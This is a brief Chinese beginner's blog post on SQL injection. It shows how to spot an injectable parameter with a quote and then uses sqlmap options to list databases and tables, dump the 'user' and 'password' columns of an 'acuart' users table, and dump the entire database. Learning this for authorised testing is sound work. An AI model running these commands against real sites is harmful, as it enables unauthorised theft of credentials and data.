关于sql注入的问题(小白)
第一是关于工具:sqlmap;
对于一个网站是否存在sql注入漏洞,我们可以通过在参数后面加’ 看是否闭合,从而判断是否存在sql注入。
然后我们就发现报错到这里我们就使用sqlmap来进行扫描。
语法为python sqlmap,py -u ""然后我们就发现acuart存在get方式的注入,数据库为MySQL。然后我们查看用户 在url后面加上–users然后再对数据库进行查看–dbs我们发现了在当前的权限下可以看到两个数据库。
接着我们就查看了acuart中的数据–tables -D "数据库名"接着查看users表中的数据–columns -T “users” -D “acuart”
我们的关注点在password和user,所以我们就要dump下来
-D “acuart” -T “users” -C “user,password” --dump
如果你想下载整个数据库(脱裤),就直接-D `“acuart” --dump-all
就这样,一次get请求的SQL注入就完成了。
如果文章有不善的地方,欢迎大佬斧正。
sql注入及其工具sqlmap的使用(小白)
最新推荐文章于 2021-07-07 23:29:02 发布